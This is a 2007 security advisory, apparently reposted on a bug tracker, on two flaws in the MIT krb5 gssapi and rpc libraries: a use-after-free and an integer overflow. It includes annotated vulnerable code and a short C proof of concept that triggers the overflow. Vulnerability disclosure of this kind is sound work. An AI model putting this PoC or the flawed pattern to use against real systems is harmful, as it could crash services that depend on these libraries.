mit-krb5 lib vulnerability [Security Advisory] Advisory: [AD_LAB-0714] mit-krb5 gssapi and rpc lib vulnerability Class: Design Error DATE:11/9/2007 CVEID: CVE-2007-5901,CVE-2007-5902 Vulnerable: mit-krb5 All Vendor: MIT I.Synopsis Two vulnerability has been discovered in gssapi lib and rpc lib included in mit-krb5. II.DETAILS: ---------- Background The gssapi lib and rpc lib is crypt libs including in mit-krb5. Description There is a dereferencing vulnerability in function gss_indicate_mechs(minorStatus, mechSet) in g_initialize.c. ...... 197 for (i = 0; i < (*mechSet)->count; i++) { 198 curItem = &((*mechSet)->elements[i]); 199 curItem->elements = 200 (void *) malloc(g_mechSet.elements[i].length); 201 if (curItem->elements == NULL) { 202 (void) k5_mutex_unlock(&g_mechSetLock); 203 /* 204 * must still free the allocated elements for 205 * each allocated gss_OID_desc 206 */ 207 for (j = 0; j < i; j++) { 208 free((*mechSet)->elements[j].elements); 209 } 210 free((*mechSet)->elements); (1)Pointer "mechSet" freed by "free" 211 free(mechSet); (2)Dereferencing freed pointer "mechSet" 212 *mechSet = NULL; 213 return (GSS_S_FAILURE); 214 } 215 g_OID_copy(curItem, &g_mechSet.elements[i]); 216 } 217 (void) k5_mutex_unlock(&g_mechSetLock); 218 return (GSS_S_COMPLETE); 219 } /* gss_indicate_mechs */ ...... There is a integer overflow vunerability in function svcauth_gss_get_principal in svc_auth_gss.c 666 svcauth_gss_get_principal(SVCAUTH *auth) 667 { 668 struct svc_rpc_gss_data *gd; 669 char *pname; 670 671 gd = SVCAUTH_PRIVATE(auth); 672 673 if (gd->cname.length == 0) 674 return (NULL); 675 (1) if cnname.length is set to 0xffffffff, it will cause a integer overflow when memcpy in line 679 676 if ((pname = malloc(gd->cname.length + 1)) == NULL) 677 return (NULL); 678 679 memcpy(pname, gd->cname.value, gd->cname.length); 680 pname[gd->cname.length] = '\0'; 681 682 return (pname); 683 } Impact A remote attacker may cause instability and potentially crash an application or service that using the gssapi lib or rpc lib in mit-krb5. POC rpc_lib_poc: #include <string.h> #ifdef HAVE_UNISTD_H #include <unistd.h> #endif #include <gssrpc/rpc.h> #include <gssapi/gssapi.h> #include <gssrpc/rpc.h> #include <gssrpc/auth_gssapi.h> #include "rpc_test.h" struct svc_rpc_gss_data { bool_t established; /* context established */ gss_ctx_id_t ctx; /* context id */ struct rpc_gss_sec sec; /* security triple */ gss_buffer_desc cname; /* GSS client name */ u_int seq; /* sequence number */ u_int win; /* sequence window */ u_int seqlast; /* last sequence number */ uint32_t seqmask; /* bitmask of seqnums */ gss_name_t client_name; /* unparsed name string */ gss_buffer_desc checksum; /* so we can free it */ }; int main(argc, argv) int argc; char **argv; { SVCAUTH auth; struct svc_rpc_gss_data gd; gd.cname.length=0xffffffff; auth.svc_ah_private=&gd; svcauth_gss_get_principal(&auth); } III.CREDIT: ---------- Venustech AD-LAB discovery this vuln. Thank to all Venustech AD-Lab guys. V.DISCLAIMS: ----------- The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Copyright 1996-2007 VENUSTECH. All Rights Reserved. Terms of use. VENUSTECH Security Lab VENUSTECH INFORMATION TECHNOLOGY CO.,LTD(http://www.venustech.com.cn) Security Trusted {Solution} Provider Service
*** This bug has been marked as a duplicate of bug 199205 ***